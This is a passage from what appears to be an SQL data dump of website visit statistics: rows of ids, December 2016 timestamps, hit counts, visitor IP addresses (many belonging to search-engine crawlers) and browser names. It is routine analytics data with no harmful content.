177.46','chrome'),(79713,1482419480,1,1,0,0,'91.196.178.164','chrome'),(79714,1482422518,1,1,0,0,'66.102.9.27','other'),(79715,1482422800,1,0,1,0,'66.249.76.107',''),(79716,1482424154,1,1,0,0,'91.196.178.40','chrome'),(79717,1482424599,1,0,1,0,'66.249.66.84',''),(79718,1482425538,1,1,0,0,'207.46.13.22','other'),(79719,1482426291,1,1,0,0,'92.113.133.193','chrome'),(79720,1482426971,1,1,0,0,'91.124.181.167','firefox'),(79721,1482427661,1,1,0,0,'66.249.76.108','chrome'),(79722,1482428295,1,1,0,0,'66.249.66.183','chrome'),(79723,1482428297,1,1,0,0,'66.249.76.29','chrome'),(79724,1482428756,1,0,1,0,'66.249.66.87',''),(79725,1482429032,1,1,0,0,'91.196.178.103','firefox'),(79726,1482430027,1,1,0,0,'91.196.178.103','firefox'),(79727,1482430276,1,1,0,0,'157.55.39.228','other'),(79728,1482430390,1,1,0,0,'163.172.64.227','other'),(79729,1482430834,1,1,0,0,'95.135.212.107','chrome'),(79730,1482431233,1,1,0,0,'91.196.178.166','chrome'),(79731,1482431344,1,0,1,0,'66.249.66.81',''),(79732,1482432037,1,0,1,0,'66.249.66.84',''),(79733,1482432056,1,1,0,0,'163.172.64.192','other'),(79734,1482432113,1,1,0,0,'95.132.135.49','chrome'),(79735,1482432240,1,1,0,0,'157.55.39.228','other'),(79736,1482432732,3,3,0,0,'195.154.183.187','other'),(79738,1482433181,8,8,0,0,'70.119.100.27','other'),(79739,1482433744,1,1,0,0,'78.111.190.243','chrome'),(79740,1482433862,1,1,0,0,'185.26.180.199','other'),(79741,1482433955,1,1,0,0,'95.10.30.87','other'),(79742,1482434834,1,1,0,0,'91.124.181.167','firefox'),(79743,1482435954,1,1,0,0,'157.55.39.228','other'),(79744,1482437303,1,1,0,0,'46.211.204.13','chrome'),(79745,1482437380,1,0,1,0,'66.249.66.177',''),(79746,1482437391,1,0,1,0,'66.249.76.29',''),(79747,1482437680,1,1,0,0,'66.249.66.183','chrome'),(79748,1482437704,1,1,0,0,'62.212.73.211','other'),(79749,1482438625,1,1,0,0,'163.172.64.252','other'),(79750,1482438662,1,0,1,0,'66.249.66.87',''),(79751,1482439311,1,1,0,0,'163.172.64.237','other'),(79752,1482439312,1,1,0,0,'163.172.64.192','other'),(79753,1482439472,2,2,0,0,'141.8.183.25','other'),(79754,1482439639,1,1,0,0,'91.196.178.36','chrome'),(79755,1482441087,1,1,0,0,'193.34.172.169','chrome'),(79756,1482441884,1,1,0,0,'207.46.13.4','other'),(79757,1482443487,1,1,0,0,'157.55.39.161','other'),(79758,1482443909,1,1,0,0,'66.249.76.107','chrome'),(79759,1482443995,1,1,0,0,'66.249.66.180','chrome'),(79760,1482444288,1,1,0,0,'163.172.64.188','other'),(79761,1482444749,1,1,0,0,'207.46.13.22','other'),(79762,1482445751,1,0,1,0,'66.249.76.28',''),(79763,1482445887,1,1,0,0,'176.193.98.244','opera'),(79764,1482446030,2,0,2,0,'66.249.76.27',''),(79765,1482446928,1,1,0,0,'163.172.64.224','other'),(79766,1482447092,1,1,0,0,'51.255.51.70','other'),(79767,1482447888,1,1,0,0,'141.8.183.25','other'),(79768,1482448121,1,1,0,0,'130.193.50.34','other'),(79769,1482448341,1,1,0,0,'207.46.13.4','other'),(79770,1482448728,1,1,0,0,'163.172.64.254','other'),(79771,1482448916,1,0,1,0,'66.249.66.81',''),(79772,1482450101,1,1,0,0,'157.55.39.161','other'),(79773,1482450773,1,1,0,0,'141.8.183.25','other'),(79774,1482450958,1,1,0,0,'163.172.64.178','other'),(79775,1482451335,1,0,1,0,'66.249.66.84',''),(79776,1482451473,1,1,0,0,'66.102.9.29','other'),(79777,1482452029,1,1,0,0,'130.193.50.34','other'),(79778,1482452493,1,0,1,0,'66.249.66.84',''),(79779,1482453772,1,1,0,0,'130.193.50.34','other'),(79780,1482453920,1,1,0,0,'193.90.12.88','chrome'),(79781,1482454573,1,1,0,0,'130.193.51.19','other'),(79782,1482455060,1,0,1,0,'66.249.76.29',''),(79783,1482455469,1,0,1,0,'66.249.66.177',''),(79784,1482456217,1,1,0,0,'141.8.183.25','other'),(79785,1482457158,1,1,0,0,'66.249.76.27','chrome'),(79786,1482457161,1,1,0,0,'66.249.76.107','chrome'),(79787,1482457546,2,2,0,0,'130.193.50.34','other'),(79788,1482458642,1,0,1,0,'66.249.76.27',''),(79789,1482460017,1,1,0,0,'180.76.15.6','other'),(79790,1482461084,1,0,1,0,'66.249.66.97',''),(79791,1482461112,1,1,0,0,'163.172.64.248','other'),(79792,1482461197,1,0,1,0,'66.249.76.27',''),(79793,1482461222,1,0,1,0,'66.249.76.29',''),(79794,1482463876,1,1,0,0,'163.172.64.224','other'),(79795,1482464526,1,1,0,0,'157.55.39.195','other'),(79796,1482465537,1,1,0,0,'141.8.183.25','other'),(79797,1482465737,1,0,1,0,'66.249.76.27',''),(79798,1482465786,1,1,0,0,'66.102.9.27','other'),(79799,1482466346,1,1,0,0,'163.172.64.179','other'),(79800,1482466739,1,0,1,0,'66.249.76.28',''),(79801,1482466993,1,1,0,0,'178.92.240.119','chrome'),(79802,1482467549,1,1,0,0,'157.55.39.161','other'),(79803,1482467625,1,1,0,0,'141.8.142.67','other'),(79804,1482468474,1,1,0,0,'141.8.142.155','other'),(79805,1482468481,1,1,0,0,'66.102.9.23','other'),(79806,1482468774,1,1,0,0,'180.76.15.162','other'),(79807,1482469770,1,0,1,0,'66.249.66.183',''),(79808,1482470226,1,0,1,0,'66.249.76.108',''),(79809,1482470246,1,0,1,0,'66.249.76.107',''),(79810,1482470516,1,1,0,0,'207.46.13.4','other'),(79811,1482470842,1,0,1,0,'66.249.76.27',''),(79812,1482471756,1,1,0,0,'91.196.178.72','firefox'),(79813,1482472252,1,0,1,0,'66.249.66.87',''),(79814,1482472323,1,0,1,0,'66.249.76.27',''),(79815,1482473261,1,1,0,0,'163.172.64.252','other'),(79816,1482473665,1,1,0,0,'162.210.196.130','other'),(79817,1482474313,1,1,0,0,'91.196.178.70','chrome'),(79818,1482474809,1,1,0,0,'91.196.178.67','chrome'),(79819,1482474829,1,1,0,0,'91.196.178.72','firefox'),(79820,1482475120,1,1,0,0,'66.102.9.29','chrome'),(79821,1482476225,1,0,1,0,'66.249.76.27',''),(79822,1482476490,1,1,0,0,'31.41.70.15','opera'),(79823,1482477016,1,1,0,0,'91.196.177.46','chrome'),(79824,1482477476,1,1,0,0,'66.249.66.84','chrome'),(79825,1482478384,1,1,0,0,'77.93.41.218','chrome'),(79826,1482479024,1,1,0,0,'37.57.71.114','chrome'),(79827,1482479433,1,1,0,0,'77.120.243.29','opera'),(79828,1482480011,1,0,1,0,'66.249.76.27',''),(79829,1482480213,1,1,0,0,'66.102.9.27','other'),(79830,1482480235,1,1,0,0,'163.172.64.236','other'),(79831,1482480252,3,0,3,0,'66.249.76.28',''),(79832,1482480388,2,0,2,0,'66.249.66.87',''),(79833,1482482188,1,1,0,0,'213.133.168.179','chrome'),(79834,1482483156,1,1,0,0,'91.196.178.72','firefox'),(79835,1482483268,1,1,0,0,'91.196.178.70','chrome'),(79836,1482483290,1,0,1,0,'66.249.76.109',''),(79837,1482484143,1,0,1,0,'66.249.76.29',''),(79838,1482484161,1,0,1,0,'66.249.76.28',''),(79839,1482484632,1,0,1,0,'66.249.66.87',''),(79840,1482484659,1,0,1,0,'66.249.66.81',''),(79841,1482484999,1,1,0,0,'163.172.64.181','other'),(79842,1482485032,1,1,0,0,'66.249.76.107','chrome'),(79843,1482485034,1,1,0,0,'66.249.66.84','chrome'),(79844,1482485665,1,1,0,0,'178.255.215.94','other'),(79845,1482485807,1,1,0,0,'46.219.2.9','chrome'),(79846,1482486070,1,1,0,0,'91.196.178.72','firefox'),(79847,1482486635,1,1,0,0,'66.249.76.29','chrome'),(79848,1482487231,1,1,0,0,'91.196.178.67','chrome'),(79849,1482488568,1,1,0,0,'66.249.76.27','chrome'),(79850,1482488639,1,1,0,0,'130.193.50.34','other'),(79851,1482488796,1,0,1,0,'66.249.76.29',''),(79852,1482491882,1,1,0,0,'91.196.178.161','chrome'),(79853,1482492683,1,1,0,0,'78.111.188.243','chrome'),(79854,1482492960,1,1,0,0,'207.46.13.4','other'),(79855,1482492984,1,0,1,0,'66.249.76.28',''),(79856,1482493180,1,1,0,0,'91.196.177.26','chrome'),(79857,1482493815,1,0,1,0,'66.249.76.27',''),(79858,1482494077,1,1,0,0,'91.124.250.141','firefox'),(79859,1482494782,1,1,0,0,'40.77.167.75','other'),(79860,1482495317,1,1,0,0,'66.102.9.25','other'),(79861,1482495486,1,0,1,0,'66.249.76.29',''),(79862,1482495842,1,1,0,0,'66.249.66.87','chrome'),(79863,1482495976,1,1,0,0,'163.172.64.187','other'),(79864,1482496188,2,2,0,0,'91.196.177.46','firefox'),(79865,1482496819,1,1,0,0,'37.52.22.52','chrome'),(79866,1482496836,1,1,0,0,'141.8.183.25','other'),(79867,1482496939,1,1,0,0,'95.132.47.225','firefox'),(79868,1482497255,1,1,0,0,'157.55.39.195','other'),(79869,1482497274,1,1,0,0,'163.172.64.177','other'),(79870,1482497686,1,0,1,0,'66.249.76.27',''),(79871,1482497992,1,1,0,0,'46.242.66.6','chrome'),(79872,1482498112,1,1,0,0,'37.53.91.14','chrome'),(79873,1482498729,1,1,0,0,'46.219.243.39','chrome'),(79874,1482499805,1,1,0,0,'31.43.23.229','chrome'),(79875,1482500273,1,0,1,0,'66.249.76.108',''),(79876,1482500369,1,1,0,0,'91.196.178.67','chrome'),(79877,1482500549,2,0,2,0,'66.249.66.84',''),(79878,1482500704,1,0,1,0,'66.249.76.28',''),(79879,1482501108,1,1,0,0,'82.145.220.162','other'),(79880,1482501566,1,1,0,0,'94.179.32.82','firefox'),(79881,1482501573,1,1,0,0,'207.46.13.22','other'),(79882,1482501638,1,1,0,0,'37.204.152.138','msie'),(79883,1482501762,1,1,0,0,'91.196.178.72','chrome'),(79884,1482502014,1,1,0,0,'95.24.233.139','firefox'),(79885,1482502777,2,1,1,0,'66.249.76.27',''),(79886,1482503986,1,0,1,0,'66.249.76.28',''),(79887,1482504256,1,0,1,0,'66.249.76.29',''),(79888,1482504447,1,1,0,0,'37.204.56.120','chrome'),(79889,1482504517,1,1,0,0,'91.196.178.71','firefox'),(79890,1482504834,1,1,0,0,'46.164.145.126','chrome'),(79891,1482504918,1,1,0,0,'91.196.178.161','chrome'),(79892,1482505800,1,0,1,0,'66.249.76.27',''),(79893,1482506869,1,1,0,0,'91.196.178.167','chrome'),(79894,1482507204,24,24,0,0,'51.255.203.87','other'),(79895,1482507451,1,0,1,0,'66.249.76.29',''),(79896,1482508053,1,1,0,0,'188.255.17.188','msie'),(79897,1482508080,1,1,0,0,'66.249.76.29','chrome'),(79898,1482508082,1,1,0,0,'66.249.76.109','chrome'),(79899,1482509016,1,1,0,0,'66.102.9.27','other'),(79900,1482512481,1,1,0,0,'91.124.181.167','firefox'),(79901,1482512715,1,0,1,0,'66.249.76.29',''),(79902,1482512761,1,1,0,0,'207.46.13.22','other'),(79903,1482513702,1,1,0,0,'128.72.64.224','msie'),(79904,1482513837,1,1,0,0,'69.30.198.186','other'),(79905,1482514266,1,1,0,0,'176.195.127.47','chrome'),(79906,1482514417,1,0,1,0,'66.249.66.180',''),(79907,1482514499,1,1,0,0,'91.196.177.35','firefox'),(79908,1482514733,1,1,0,0,'46.164.154.226','opera'),(79909,1482514817,1,0,1,0,'66.249.76.29',''),(79910,1482515113,1,0,1,0,'66.249.66.84',''),(79911,1482515887,1,1,0,0,'46.164.154.226','opera'),(79912,1482516162,2,0,2,0,'66.249.76.28',''),(79913,1482516168,1,1,0,0,'91.196.178.33','firefox'),(79914,1482517144,1,1,0,0,'141.8.183.25','other'),(79915,1482517583,1,1,0,0,'46.211.112.81','other'),(79916,1482518070,1,1,0,0,'163.172.64.178','other'),(79917,1482519659,1,0,1,0,'66.249.65.188',''),(79918,1482520036,1,1,0,0,'141.8.142.61','other'),(79919,1482520837,2,0,2,0,'66.249.65.182',''),(79920,1482520870,2,0,2,0,'66.249.65.185',''),(79921,1482521029,1,1,0,0,'176.193.92.233','firefox'),(79922,1482521116,1,1,0,0,'176.195.122.135','chrome'),(79923,1482521774,1,0,1,0,'66.249.65.185',''),(79924,1482522060,1,1,0,0,'163.172.64.231','other'),(79925,1482522702,1,1,0,0,'163.172.64.220','other'),(79926,1482522737,1,1,0,0,'91.124.181.167','firefox'),(79927,1482523722,1,0,1,0,'66.249.65.182',''),(79928,1482523726,1,0,1,0,'66.249.65.188',''),(79929,1482523765,1,0,1,0,'66.249.65.185',''),(79930,1482524728,1,0,1,0,'66.249.65.188',''),(79931,1482526829,3,3,0,0,'141.8.183.25','other'),(79932,1482526840,1,1,0,0,'130.193.50.34','other'),(79933,1482527222,2,0,2,0,'66.249.65.188',''),(79934,1482527345,1,0,1,0,'66.249.65.182',''),(79935,1482527387,1,0,1,0,'66.249.65.185',''),(79936,1482528348,1,1,0,0,'157.55.39.195','other'),(79937,1482528809,1,0,1,0,'66.249.73.138',''),(79938,1482529082,1,0,1,0,'66.249.65.182',''),(79939,1482530857,1,1,0,0,'66.249.73.133','chrome'),(79940,1482530858,1,1,0,0,'66.249.65.182','chrome'),(79941,1482531889,1,0,1,0,'66.249.65.185',''),(79942,1482534645,1,0,1,0,'66.249.65.182',''),(79943,1482535925,1,0,1,0,'66.249.65.182',''),(79944,1482537227,1,0,1,0,'66.249.73.138',''),(79945,1482537621,1,0,1,0,'66.249.65.182',''),(79946,1482537737,1,0,1,0,'66.249.65.185',''),(79947,1482537776,1,1,0,0,'163.172.64.180','other'),(79948,1482538329,1,0,1,0,'66.249.65.188',''),(79949,1482539597,1,1,0,0,'130.193.51.19','other'),(79950,1482540297,1,1,0,0,'109.63.143.187','chrome'),(79951,1482541222,1,1,0,0,'180.76.15.26','other'),(79952,1482542722,2,0,2,0,'66.249.65.182',''),(79953,1482543461,1,1,0,0,'130.193.51.19','other'),(79954,1482543964,1,1,0,0,'46.242.30.55','chrome'),(79955,1482544018,1,1,0,0,'176.193.110.167','chrome'),(79956,1482544076,1,1,0,0,'207.46.13.4','other'),(79957,1482544260,1,0,1,0,'66.249.65.188',''),(79958,1482545038,1,0,1,0,'66.249.65.185',''),(79959,1482545501,1,1,0,0,'66.249.65.188','chrome'),(79960,1482546016,1,1,0,0,'163.172.64.254','other'),(79961,1482546679,1,1,0,0,'141.8.183.25','other'),(79962,1482547035,1,1,0,0,'157.55.39.195','other'),(79963,1482547590,1,1,0,0,'66.249.73.133','chrome'),(79964,1482548410,1,1,0,0,'180.76.15.8','other'),(79965,1482548974,1,0,1,0,'66.249.65.185',''),(79966,1482549076,1,0,1,0,'66.249.65.182',''),(79967,1482550478,1,0,1,0,'66.249.65.182',''),(79968,1482552356,1,1,0,0,'66.102.9.27','other'),(79969,1482553250,1,1,0,0,'176.14.38.9','msie'),(79970,1482553684,1,0,1,0,'66.249.65.182',''),(79971,1482554490,1,1,0,0,'163.172.64.227','other'),(79972,1482554561,1,0,1,0,'66.249.65.188',''),(79973,1482554728,1,1,0,0,'130.193.51.19','other'),(79974,1482556819,1,1,0,0,'180.76.15.154','other'),(79975,1482557866,1,1,0,0,'130.193.50.34','other'),(79976,1482559003,1,0,1,0,'66.249.65.182',''),(79977,1482559650,1,0,1,0,'66.249.65.185',''),(79978,1482560470,2,0,2,0,'66.249.65.182',''),(79979,1482560508,1,1,0,0,'195.154.181.162','chrome'),(79980,1482560639,2,0,2,0,'66.249.65.185',''),(79981,1482561465,2,2,0,0,'95.213.141.126','opera'),(79982,1482562368,1,0,1,0,'66.249.65.182',''),(79983,1482562434,1,0,1,0,'66.249.73.143',''),(79984,1482562565,1,0,1,0,'66.249.73.133',''),(79985,1482562737,1,0,1,0,'66.249.65.188',''),(79986,1482562897,1,1,0,0,'163.172.64.178','other'),(79987,1482564691,1,1,0,0,'66.102.9.29','chrome'),(79988,1482564814,1,1,0,0,'91.124.181.167','firefox'),(79989,1482565751,1,0,1,0,'66.249.65.188',''),(79990,1482566949,1,0,1,0,'66.249.65.188',''),(79991,1482567051,1,1,0,0,'163.172.64.189','other'),(79992,1482567381,1,1,0,0,'66.102.9.29','other'),(79993,1482567893,1,1,0,0,'66.249.73.138','chrome'),(79994,1482568017,1,1,0,0,'94.179.208.149','chrome'),(79995,1482568198,1,0,1,0,'66.249.65.185',''),(79996,1482568820,33,33,0,0,'149.202.54.71','other'),(79997,1482569997,1,0,1,0,'66.249.65.188',''),(79998,1482570635,1,1,0,0,'157.55.39.220','other'),(79999,1482570766,1,1,0,0,'66.102.9.27','other'),(80000,1482571257,1,1,0,0,'163.172.64.222','other'),(80001,1482572048,214,214,0,0,'213.251.184.38','other'),(80002,1482572609,1,1,0,0,'95.24.120.24','msie'),(80003,1482572905,1,1,0,0,'130.193.51.45','other'),(80004,1482572949,86,86,0,0,'213.251.184.38','other'),(80005,1482573381,1,1,0,0,'163.172.64.224','other'),(80006,1482574351,1,1,0,0,'163.172.64.235','other'),(80007,1482574512,1,1,0,0,'46.200.55.151','chrome'),(80008,1482574534,1,1,0,0,'180.153.214.198','msie'),(80009,1482574630,1,1,0,0,'46.188.52.124','msie'),(80010,1482574959,1,1,0,0,'207.46.13.22','other'),(80011,1482575035,1,0,1,0,'66.249.65.185',''),(80012,1482577696,1,1,0,0,'207.46.13.22','other'),(80013,1482578285,1,1,0,0,'176.14.219.215','msie'),(80014,1482578421,1,1,0,0,'109.63.165.24','msie'),(80015,1482578566,1,1,0,0,'163.172.64.231','other'),(80016,1482579078,1,1,0,0,'95.24.237.53','msie'),(80017,1482580003,1,0,1,0,'66.249.65.185',''),(80018,1482580125,1,1,0,0,'180.76.15.24','other'),(80019,1482581584,1,1,0,0,'66.102.9.29','other'),(80020,1482582632,2,0,2,0,'66.249.65.188',''),(80021,1482582702,1,1,0,0,'195.10.210.49','chrome'),(80022,1482583106,1,1,0,0,'66.249.65.182','chrome'),(80023,1482583511,1,1,0,0,'207.46.13.4','other'),(80024,1482583749,1,0,1,0,'66.249.65.185',''),(80025,1482585645,1,1,0,0,'163.172.64.232','other'),(80026,1482586101,1,0,1,0,'66.249.73.163',''),(80027,1482586330,1,1,0,0,'91.124.119.122','firefox'),(80028,1482586755,1,0,1,0,'66.249.65.188',''),(80029,1482587002,1,1,0,0,'66.249.65.185','chrome'),(80030,1482588451,1,0,1,0,'66.249.65.182',''),(80031,1482589394,1,1,0,0,'157.55.39.220','other'),(80032,1482589600,1,1,0,0,'66.249.65.182','chrome'),(80033,1482591390,1,1,0,0,'141.8.142.67','other'),(80034,1482592149,1,0,1,0,'66.249.65.188',''),(80035,1482592388,1,0,1,0,'66.249.73.167',''),(80036,1482592396,1,1,0,0,'91.196.178.69','other'),(80037,1482592766,1,0,1,0,'66.249.65.185',''),(80038,1482593194,1,1,0,0,'157.55.39.220','other'),(80039,1482593744,1,1,0,0,'199.58.86.206','other'),(80040,1482593997,1,1,0,0,'193.194.124.5','chrome'),(80041,1482595290,1,1,0,0,'46.149.186.16','chrome'),(80042,1482596016,1,1,0,0,'66.102.9.29','other'),(80043,1482596397,1,0,1,0,'66.249.65.188',''),(80044,1482596539,1,1,0,0,'195.154.181.15','chrome'),(80045,1482597883,1,1,0,0,'46.164.145.126','chrome'),(80046,1482598784,1,0,1,0,'66.249.65.182',''),(80047,1482599682,1,0,1,0,'66.249.73.163',''),(80048,1482600213,1,1,0,0,'78.111.190.2','chrome'),(80049,1482600488,2,0,2,0,'66.249.65.182',''),(80050,1482600622,1,0,1,0,'66.249.65.188',''),(80051,1482601843,1,0,1,0,'66.249.65.188',''),(80052,1482602619,1,1,0,0,'46.211.6.81','other'),(80053,1482603001,1,1,0,0,'66.249.73.163','chrome'),(80054,1482604820,1,1,0,0,'46.229.168.70','other'),(80055,1482605829,1,1,0,0,'91.196.178.99','chrome'),(80056,1482605831,1,1,0,0,'31.13.102.107','other'),(80057,1482606675,1,1,0,0,'91.196.178.66','chrome'),(80058,1482607075,1,1,0,0,'207.46.13.4','other'),(80059,1482607177,1,0,1,0,'66.249.66.183',''),(80060,1482608817,1,0,1,0,'66.249.66.87',''),(80061,1482609166,1,1,0,0,'207.46.13.22','other'),(80062,1482609259,1,1,0,0,'66.249.66.87','chrome'),(80063,1482609303,1,1,0,0,'66.249.66.180','chrome'),(80064,1482609983,1,1,0,0,'130.193.50.34','other'),(80065,1482610036,1,1,0,0,'95.108.133.210','chrome'),(80066,1482610650,1,1,0,0,'66.102.9.27','other'),(80067,1482614372,1,1,0,0,'163.172.64.180','other'),(80068,1482615268,2,2,0,0,'91.198.143.122','other'),(80069,1482615391,1,1,0,0,'163.172.64.236','other'),(80070,1482617287,1,0,1,0,'66.249.66.177',''),(80071,1482617559,1,1,0,0,'66.249.66.177','chrome'),(80072,1482617645,1,1,0,0,'163.172.64.179','other'),(80073,1482617720,1,1,0,0,'163.172.64.184','other'),(80074,1482618506,2,0,2,0,'66.249.66.81',''),(80075,1482619440,1,1,0,0,'207.46.13.4','other'),(80076,1482619792,1,0,1,0,'66.249.66.87',''),(80077,1482621983,1,0,1,0,'66.249.66.81',''),(80078,1482623466,1,0,1,0,'66.249.66.81',''),(80079,1482623749,1,1,0,0,'178.94.172.224','chrome'),(80080,1482624154,1,0,1,0,'66.249.66.84',''),(80081,1482624916,1,1,0,0,'66.102.9.29','other'),(80082,1482626893,1,1,0,0,'40.77.167.75','other'),(80083,1482630020,1,1,0,0,'207.46.13.22','other'),(80084,1482631504,1,0,1,0,'66.249.66.84',''),(80085,1482632854,1,0,1,0,'66.249.66.84',''),(80086,1482637527,1,1,0,0,'141.8.183.25','other'),(80087,1482638702,1,1,0,0,'141.8.142.67','other'),(80088,1482639337,1,1,0,0,'66.102.9.27','other'),(80089,1482639658,1,1,0,0,'66.249.66.183','chrome'),(80090,1482645563,1,0,1,0,'66.249.66.87',''),(80091,1482646441,1,1,0,0,'66.102.9.27','other'),(80092,1482646793,1,1,0,0,'91.196.178.40','chrome'),(80093,1482648859,7,7,0,0,'37.73.239.182','other'),(80094,1482650725,1,0,1,0,'66.249.66.81',''),(80095,1482651542,1,1,0,0,'91.230.25.123','firefox'),(80096,1482651653,1,1,0,0,'163.172.64.244','other'),(80097,1482651781,105,105,0,0,'69.30.221.250','other'),(80098,1482653185,1,1,0,0,'141.8.142.67','other'),(80099,1482653552,1,1,0,0,'178.95.204.128','chrome'),(80100,1482653804,1,1,0,0,'180.76.15.18','other'),(80101,1482654000,1,1,0,0,'130.193.50.34','other'),(80102,1482655373,1,1,0,0,'66.249.66.177','chrome'),(80103,1482657354,1,0,1,0,'66.249.66.87',''),(80104,1482658365,1,1,0,0,'163.172.64.188','other'),(80105,1482658773,1,0,1,0,'66.249.66.81',''),(80106,1482661182,1,1,0,0,'66.102.9.27','other'),(80107,1482662294,1,0,1,0,'66.249.66.177',''),(80108,1482662969,1,1,0,0,'40.77.167.75','other'),(80109,1482663681,1,1,0,0,'108.59.8.70','other'),(80110,1482664568,1,1,0,0,'94.179.63.168','firefox'),(80111,1482664810,1,1,0,0,'40.77.167.75','other'),(80112,1482664914,2,2,0,0,'66.249.66.84','chrome'),(80113,1482664962,2,2,0,0,'66.249.66.81','chrome'),(80114,1482665359,1,1,0,0,'130.180.212.63','chrome'),(80115,1482665393,1,1,0,0,'141.8.183.25','other'),(80116,1482666341,1,1,0,0,'91.196.178.132','chrome'),(80117,1482666829,1,1,0,0,'157.55.39.220','other'),(80118,1482666939,1,1,0,0,'66.249.66.180','chrome'),(80119,1482667577,1,1,0,0,'78.111.190.246','chrome'),(80120,1482668255,1,1,0,0,'163.172.64.241','other'),(80121,1482668458,1,0,1,0,'66.249.66.177',''),(80122,1482668462,1,1,0,0,'66.249.66.183','chrome'),(80123,1482668591,1,1,0,0,'157.55.39.220','other'),(80124,1482668713,1,0,1,0,'66.249.66.81',''),(80125,1482669969,1,1,0,0,'66.249.66.84','chrome'),(80126,1482673785,1,1,0,0,'180.76.15.18','other'),(80127,1482674153,1,1,0,0,'46.211.252.21','chrome'),(80128,1482674938,1,0,1,0,'66.249.66.81',''),(80129,1482675072,1,0,1,0,'66.249.66.177',''),(80130,1482675538,1,1,0,0,'207.46.13.4','other'),(80131,1482675567,1,1,0,0,'66.102.9.27','other'),(80132,1482675588,1,1,0,0,'91.196.178.100','chrome'),(80133,1482675618,1,1,0,0,'130.193.50.34','other'),(80134,1482675640,1,1,0,0,'180.76.15.159','other'),(80135,1482676307,1,1,0,0,'93.158.152.84','other'),(80136,1482678611,1,1,0,0,'207.46.13.4','other'),(80137,1482680028,1,1,0,0,'66.249.66.87','chrome'),(80138,1482680099,1,1,0,0,'66.249.66.81','chrome'),(80139,1482680540,1,1,0,0,'66.249.66.180','chrome'),(80140,1482680988,15,15,0,0,'148.251.54.44','firefox'),(80141,1482681013,6,6,0,0,'148.251.54.44','chrome'),(80142,1482681065,3,3,0,0,'148.251.54.44','other'),(80143,1482681067,2,2,0,0,'148.251.54.44','msie'),(80144,1482681807,1,0,1,0,'66.249.66.84',''),(80145,1482682145,1,1,0,0,'180.76.15.19','other'),(80146,1482682308,1,1,0,0,'94.179.89.112','chrome'),(80147,1482682351,2,2,0,0,'92.113.127.180','chrome'),(80148,1482682801,1,1,0,0,'46.211.144.74','chrome'),(80149,1482682969,1,0,1,0,'66.249.66.84',''),(80150,1482684524,1,1,0,0,'195.154.181.15','chrome'),(80151,1482685033,3,3,0,0,'69.30.211.2','other'),(80152,1482685637,1,0,1,0,'66.249.66.81',''),(80153,1482687960,1,0,1,0,'66.249.69.149',''),(80154,1482688563,1,1,0,0,'207.46.13.22','other'),(80155,1482688878,1,1,0,0,'178.92.158.111','chrome'),(80156,1482688976,1,1,0,0,'40.77.167.75','other'),(80157,1482689295,10,10,0,0,'62.210.143.245','other'),(80158,1482689968,1,1,0,0,'66.102.9.27','other'),(80159,1482690133,1,1,0,0,'91.196.178.65','chrome'),(80160,1482690968,1,0,1,0,'66.249.75.187',''),(80161,1482691344,1,1,0,0,'141.8.142.67','other'),(80162,1482691739,1,1,0,0,'78.111.176.38','chrome'),(80163,1482692312,1,0,1,0,'66.249.75.179',''),(80164,1482692864,1,1,0,0,'91.196.178.40','other'),(80165,1482696522,1,1,0,0,'40.77.167.75','other'),(80166,1482696858,1,1,0,0,'163.172.64.252','other'),(80167,1482699095,1,0,1,0,'66.249.69.155',''),(80168,1482699651,1,1,0,0,'94.178.7.131','firefox'),(80169,1482701304,1,1,0,0,'66.249.69.155','chrome'),(80170,1482702524,1,1,0,0,'163.172.68.103','other'),(80171,1482704513,1,1,0,0,'66.102.9.29','other'),(80172,1482704732,1,1,0,0,'207.46.13.22','other'),(80173,1482712403,2,0,2,0,'66.249.75.179',''),(80174,1482712438,1,1,0,0,'217.69.136.204','other'),(80175,1482714261,1,1,0,0,'66.249.75.187','chrome'),(80176,1482714264,1,1,0,0,'66.249.69.149','chrome'),(80177,1482715159,1,1,0,0,'66.249.69.155','chrome'),(80178,1482715865,1,1,0,0,'207.46.13.22','other'),(80179,1482716491,1,1,0,0,'157.55.39.220','other'),(80180,1482718683,1,1,0,0,'207.46.13.22','other'),(80181,1482718900,1,0,1,0,'66.249.75.187',''),(80182,1482718904,1,0,1,0,'68.180.228.38',''),(80183,1482718905,1,1,0,0,'66.102.9.25','other'),(80184,1482718912,1,1,0,0,'163.172.64.247','other'),(80185,1482720112,1,0,1,0,'68.180.228.38',''),(80186,1482720942,1,1,0,0,'66.249.75.183','chrome'),(80187,1482721065,1,1,0,0,'66.249.69.152','chrome'),(80188,1482723637,1,1,0,0,'141.8.183.19','other'),(80189,1482724118,1,0,1,0,'66.249.75.179',''),(80190,1482725504,1,0,1,0,'66.249.69.149',''),(80191,1482728027,1,1,0,0,'163.172.64.177','other'),(80192,1482728656,1,0,1,0,'66.249.75.187',''),(80193,1482729040,1,1,0,0,'163.172.64.237','other'),(80194,1482729847,1,0,1,0,'66.249.75.179',''),(80195,1482730367,1,0,1,0,'66.249.75.183',''),(80196,1482730620,1,1,0,0,'91.196.178.72','firefox'),(80197,1482730742,1,1,0,0,'195.154.181.162','chrome'),(80198,1482730886,1,1,0,0,'141.8.183.19','other'),(80199,1482732244,1,0,1,0,'66.249.75.179',''),(80200,1482732741,1,1,0,0,'141.8.183.19','other'),(80201,1482733442,1,1,0,0,'66.102.9.27','other'),(80202,1482733578,1,1,0,0,'91.196.178.67','chrome'),(80203,1482733876,1,1,0,0,'66.102.9.25','chrome'),(80204,1482734234,1,1,0,0,'163.172.64.180','other'),(80205,1482734565,1,1,0,0,'91.196.178.67','chrome'),(80206,1482735676,1,1,0,0,'141.8.183.25','other'),(80207,1482735849,1,0,1,0,'66.249.75.187',''),(80208,1482735939,1,1,0,0,'91.196.178.130','chrome'),(80209,1482736904,1,1,0,0,'95.158.7.62','chrome'),(80210,1482737333,2,0,2,0,'66.249.75.183',''),(80211,1482737945,1,1,0,0,'91.196.178.72','firefox'),(80212,1482737993,1,1,0,0,'207.46.13.4','other'),(80213,1482738720,1,1,0,0,'178.92.16.199','chrome'),(80214,1482738729,1,1,0,0,'141.8.142.58','other'),(80215,1482739458,1,1,0,0,'91.196.178.33','firefox'),(80216,1482739633,1,1,0,0,'91.196.178.72','firefox'),(80217,1482740142,1,1,0,0,'130.193.37.7','other'),(80218,1482740355,1,1,0,0,'163.172.64.254','other'),(80219,1482740534,1,1,0,0,'163.172.64.228','other'),(80220,1482740680,1,0,1,0,'66.249.75.179',''),(80221,1482741766,1,0,1,0,'66.249.69.152',''),(80222,1482742402,1,0,1,0,'66.249.69.155',''),(80223,1482743060,1,1,0,0,'46.172.81.179','firefox'),(80224,1482743412,1,1,0,0,'141.8.142.61','other'),(80225,